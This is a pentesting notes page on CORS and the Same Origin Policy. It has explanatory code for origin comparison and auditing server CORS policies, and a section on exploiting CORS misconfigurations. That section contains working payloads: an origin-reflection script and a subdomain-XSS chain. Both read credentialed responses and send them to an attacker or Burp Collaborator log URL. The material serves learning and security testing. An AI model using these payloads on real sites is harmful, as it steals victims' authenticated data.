# CORS

## Browser Security Mechanisms

**Cross-Origin Resource Sharing (CORS)** is a mechanism that relaxes the [**Same Origin Policy (SOP)**](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy). Both CORS and SOP are browser security mechanisms that limit the JavaScript runtime's access to resources from different origins (loosely, different domains).

### Same Origin Policy (SOP)

JavaScript can send a request to a different "domain", but the browser will not pass the response back to the JavaScript runtime. The rule is simple: the browser blocks the response if the origin of the JavaScript differs from the origin of the resource.

The SOP has some exceptions that allow cross-domain resource access outside the JavaScript runtime context. For example, a page may load an image, a font, or JavaScript source code from a different origin. So you can load JavaScript from a different origin, but when that JavaScript executes and makes its own requests, the SOP still refuses to hand cross-origin responses over to the runtime.

### What's an Origin

An origin is the unit on which SOP and CORS decisions are made. It is the combination of protocol (scheme), domain (host), and port that identifies the "source" of a particular resource. The origin cannot simply be the domain, because a single host can serve multiple web applications on different ports and protocols.

When a user or a script makes a request to a specific URL, the browser adds the HTTP header \
`Origin: protocol://domain:port` so that the web server can decide which CORS headers to return. Regardless of whether the site supports CORS, when the browser receives the response it evaluates the origin and applies the SOP and CORS rules.
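The origin comparison the browser performs can be reproduced with its own URL parser. The following JavaScript is an added example, not code from the original page; it assumes Node.js (or a browser) with the WHATWG `URL` class and uses constructed sample URLs to show that scheme, host and port must all match.

```javascript
// Added example (not from the original page): compute the origin tuple of a URL
// and compare two URLs the way the Same Origin Policy does.
// Uses only the WHATWG URL class available in Node.js and browsers.
const DEFAULT_PORTS = { 'http:': '80', 'https:': '443', 'ws:': '80', 'wss:': '443' };

// Returns { scheme, host, port } for an absolute URL. The URL parser drops an
// explicit default port (":443" on https), so we restore it for clarity.
function originOf(urlString) {
  const url = new URL(urlString);
  const port = url.port !== '' ? url.port : (DEFAULT_PORTS[url.protocol] ?? '');
  return { scheme: url.protocol, host: url.hostname, port };
}

// Serialized form, as the browser sends it in the Origin request header.
function originString(urlString) {
  return new URL(urlString).origin;
}

// SOP decision: all three components must match exactly.
function sameOrigin(a, b) {
  const x = originOf(a);
  const y = originOf(b);
  return x.scheme === y.scheme && x.host === y.host && x.port === y.port;
}

// Constructed sample pairs showing why "same domain" is not enough.
const SAMPLE_PAIRS = [
  ['https://example.com/app', 'https://example.com:443/api/me'], // same origin (default port)
  ['https://example.com/app', 'http://example.com/api/me'],      // scheme differs
  ['https://example.com/app', 'https://api.example.com/me'],     // host differs (subdomain)
  ['https://example.com/app', 'https://example.com:8443/me'],    // port differs
];

// Evaluates every sample pair and returns the decisions.
function report() {
  return SAMPLE_PAIRS.map(([a, b]) => ({
    a: originString(a),
    b: originString(b),
    same: sameOrigin(a, b),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of report()) {
    console.log(`${r.a}  vs  ${r.b}  -> ${r.same ? 'same origin' : 'cross-origin'}`);
  }
}
```

Only the first pair is same-origin; the path is ignored, while a different scheme, a subdomain or a non-default port each makes the request cross-origin and therefore subject to CORS.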

### CORS headers

The server can send the following CORS headers to relax the SOP.

**Access-Control-Allow-Origin:** origin \
This header defines which origin is allowed to read the response.

**Access-Control-Allow-Credentials: true** \
This header allows access to authenticated resources: the browser attaches the cookie or Authorization header when JavaScript requests the resource with credentials.

## Pentesting CORS

CORS attacks assume there is an XSS vulnerability within the app and that these CORS headers are set: \
**Access-Control-Allow-Origin:** origin-value**, Access-Control-Allow-Credentials:** true

The common CORS misconfigurations are a reflected origin, a trusted null origin, and a trusted insecure protocol or subdomain origin.
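The three misconfigurations above are all decisions a server makes when it turns the request's `Origin` header into response headers. The following JavaScript is an added example, not code from the original page or from PortSwigger: it models each flawed policy and a hardened allowlist policy as plain functions, then runs a set of constructed probe origins through them to show which ones each policy would accept with credentials. The allowlist and probe values are constructed for the example.

```javascript
// Added example (not from the original page): server-side CORS policies for
// the three misconfigurations named above plus a hardened one, and an audit
// helper that reports which Origin values each policy accepts.

// Constructed allowlist of full origins (scheme + host + port).
const TRUSTED_ORIGINS = new Set(['https://app.example.com', 'https://admin.example.com']);

function allowWithCredentials(origin, extra = {}) {
  return { 'Access-Control-Allow-Origin': origin, 'Access-Control-Allow-Credentials': 'true', ...extra };
}

// Each policy takes the request's Origin header (string or undefined) and
// returns the CORS response headers it would emit, or null when refused.

// 1. Origin reflection: echoes whatever origin the client sent.
function policyReflect(origin) {
  return origin ? allowWithCredentials(origin) : null;
}

// 2. Null origin trusted: "null" is sent by sandboxed iframes, file:// pages
//    and some redirects, so any site can produce it.
function policyAllowNull(origin) {
  return origin === 'null' || TRUSTED_ORIGINS.has(origin) ? allowWithCredentials(origin) : null;
}

// 3. Insecure protocol / subdomain: any scheme and any host that merely
//    contains "example.com" is trusted. The unanchored regex is the bug.
function policySubdomainRegex(origin) {
  return origin && /^https?:\/\/.*example\.com/.test(origin) ? allowWithCredentials(origin) : null;
}

// 4. Hardened: exact match against the allowlist, credentials only for those,
//    and Vary: Origin so a shared cache never serves one origin's headers to
//    another.
function policyAllowlist(origin) {
  return TRUSTED_ORIGINS.has(origin) ? allowWithCredentials(origin, { Vary: 'Origin' }) : null;
}

// Constructed probe origins of the kind a policy audit would feed in.
const PROBES = [
  'https://app.example.com',              // legitimate
  'https://attacker.example',             // arbitrary third party
  'null',                                 // sandboxed iframe / file page
  'http://app.example.com',               // same host, insecure scheme
  'https://example.com.attacker.example', // attacker-controlled suffix
  'https://evilexample.com',              // missing dot before the domain
];

// Returns the probe origins a policy accepts with credentials.
function acceptedOrigins(policy) {
  return PROBES.filter((o) => policy(o) !== null);
}

// True when the policy accepts any origin outside the allowlist.
function isMisconfigured(policy) {
  return acceptedOrigins(policy).some((o) => !TRUSTED_ORIGINS.has(o));
}

function auditAll() {
  return {
    reflect: isMisconfigured(policyReflect),
    allowNull: isMisconfigured(policyAllowNull),
    subdomainRegex: isMisconfigured(policySubdomainRegex),
    allowlist: isMisconfigured(policyAllowlist),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, policy] of Object.entries({ policyReflect, policyAllowNull, policySubdomainRegex, policyAllowlist })) {
    console.log(name, acceptedOrigins(policy));
  }
  console.log(auditAll());
}
```

Only the allowlist policy accepts nothing outside the trusted set. Note that the regex policy accepts `http://app.example.com` (insecure scheme), `https://example.com.attacker.example` (the trusted name as a prefix of an attacker host) and `https://evilexample.com` (the trusted name as an unanchored substring); an exact-match set avoids all three without any pattern matching.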

### Origin reflection

![](/files/8u4C6yFPpuakGi0L90mn)

```html
<script>
    // Cross-origin request to the target, sent with the victim's cookies
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://domain/URI',true);
    req.withCredentials = true;
    req.send();

    // Runs once the response is readable, i.e. the server reflected the
    // origin with credentials allowed; forwards the body to the log endpoint
    function reqListener() {
        location='https://burpcollaborator.domain/log?key='+this.responseText;
    }
</script>
```

### Null origin

![](/files/Uuu4CNT8k4Sa4hmB5WlZ)

### Insecure protocol or subdomain

This case assumes an XSS vulnerability in the app running on a subdomain that the CORS policy trusts.

![](/files/5RbHg46gUanjnvCy26o2)

```html
<script>
    document.location="http://subdomain.domain/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://domain/sensitiveURI',true); req.withCredentials = true;req.send();function reqListener() {location='https://attacker/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
```

## References

<https://portswigger.net/web-security/cors>

